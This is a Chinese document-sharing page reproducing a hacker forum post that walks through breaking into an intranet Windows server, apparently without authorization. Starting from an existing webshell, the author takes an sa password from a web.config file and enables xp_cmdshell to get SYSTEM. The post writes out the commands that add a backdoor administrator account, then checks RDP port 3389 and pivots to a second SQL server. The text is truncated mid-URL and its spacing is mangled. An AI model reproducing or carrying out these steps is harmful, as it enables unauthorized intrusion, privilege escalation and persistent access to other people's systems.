資源描述:
《mssql內(nèi)網(wǎng)滲透案例分析(我也玩內(nèi)網(wǎng))》由會(huì)員上傳分享,免費(fèi)在線閱讀,更多相關(guān)內(nèi)容在教育資源-天天文庫。
1、MSSQL內(nèi)網(wǎng)滲透案例分析(我也玩內(nèi)網(wǎng))D0000D發(fā)往論壇板塊-------------------------------------------------------No2號(hào)板塊技術(shù)文章D8888D貼子標(biāo)題-------------------------------------------------------MSSQL內(nèi)網(wǎng)滲透案例分析(我也玩內(nèi)網(wǎng))D8888D主貼內(nèi)容-------------------------------------------------------圖文:ud
2、b311主題:MSSQL內(nèi)網(wǎng)滲透案例分析發(fā)表:黑白前線友情提交到t00ls.net與某菜菜們分享注:附件太多了,就引用站上的圖片吧。高手老鳥飄過!描述:對(duì)于內(nèi)網(wǎng)滲透技術(shù)一直感覺很神秘,手中正巧有一個(gè)webshell是內(nèi)網(wǎng)服務(wù)器。借此機(jī)會(huì)練習(xí)下內(nèi)網(wǎng)入侵滲透技術(shù)!本文敏感信息以屏蔽!密碼都以*號(hào)代替。此次過程主要運(yùn)用到xp_cmdshell恢復(fù)與執(zhí)行,再通過自己的靈活思維運(yùn)用。環(huán)境:2003SERVERIIS:6.0支持php數(shù)據(jù)庫:MSSQL和MYSQL網(wǎng)站類型:ASPX本文重點(diǎn)講述內(nèi)網(wǎng)滲透提權(quán)部分,
3、對(duì)于WEBSHELL不在描述。對(duì)于了解入侵滲透的朋友都知道,拿到webshell后服務(wù)器能否提權(quán)就要先找提權(quán)的漏洞所在。從本站的角度來看,存在MSSQL、MYSQL支持ASPX和PHP可以說權(quán)限夠大的了。先來看看目錄能窮舉出來哪些東西。先看程序目錄,很平常么。沒現(xiàn)有SU和MYSQL之類的信息。[img]http://www.hackline.net/uploads/allimg/100618/1_100618211638_1.jpg[/img]E:盤可以瀏覽F:盤可以瀏覽本站ASPX類型網(wǎng)站,使用的
4、是MSSQL數(shù)據(jù)庫。顯示密碼不是最高權(quán)限的用戶,就是是個(gè)DB用戶提權(quán)也不能馬上到手。[img]http://www.hackline.net/uploads/allimg/100618/1_100618211638_2.jpg[/img]再翻翻別的站點(diǎn),目錄可以瀏覽一個(gè)個(gè)找吧。發(fā)現(xiàn)一個(gè)目錄web.config有SA用戶[img]http://www.hackline.net/uploads/allimg/100618/1_100618211638_3.jpg[/img]連接數(shù)據(jù)庫信息:Source=
5、gzzx;InitialCatalog=SMSCenter;PersistSecurityInfo=True;UserID=sa;Password=****"打開aspxspy,使用database連接功能。[img]http://www.hackline.net/uploads/allimg/100618/1_100618211638_4.jpg[/img]登錄成功,顯示SA看來應(yīng)該沒有降權(quán)。連接狀態(tài)是MSSQL2005,要先啟xp_cmdshell.[img]http://www.hacklin
6、e.net/uploads/allimg/100618/1_100618211832_1.jpg[/img]接著執(zhí)行下命令"whoami"[img]http://www.hackline.net/uploads/allimg/100618/1_100618211832_2.jpg[/img]good,system權(quán)限,下面就是添加一個(gè)賬號(hào)了。。Execmaster.dbo.xp_cmdshell'netuseradmin****/add'Execmaster.dbo.xp_cmdshell'netl
7、ocalgroupadministratorsadmin/add'再看下3389端口是否開啟Execmaster.dbo.xp_cmdshell'netstat-ano'[img]http://www.hackline.net/uploads/allimg/100618/1_100618211832_3.jpg[/img]OK,狀態(tài)正常。Execmaster.dbo.xp_cmdshell'ipconfig/all'顯示配置是內(nèi)網(wǎng)IP通過域名解析到的IP連接3389,可以連接。說明管理做了端口映射,
8、這就不要轉(zhuǎn)發(fā)端口了。省了很多功夫!這才拿到了一臺(tái)服務(wù)器的權(quán)限,從網(wǎng)站的SQL連接上不難發(fā)現(xiàn)內(nèi)網(wǎng)還有SQL服務(wù)器。滲透繼續(xù)……內(nèi)網(wǎng)IP為200,同樣是MSSQLSA權(quán)限。[img]http://www.hackline.net/uploads/allimg/100618/1_10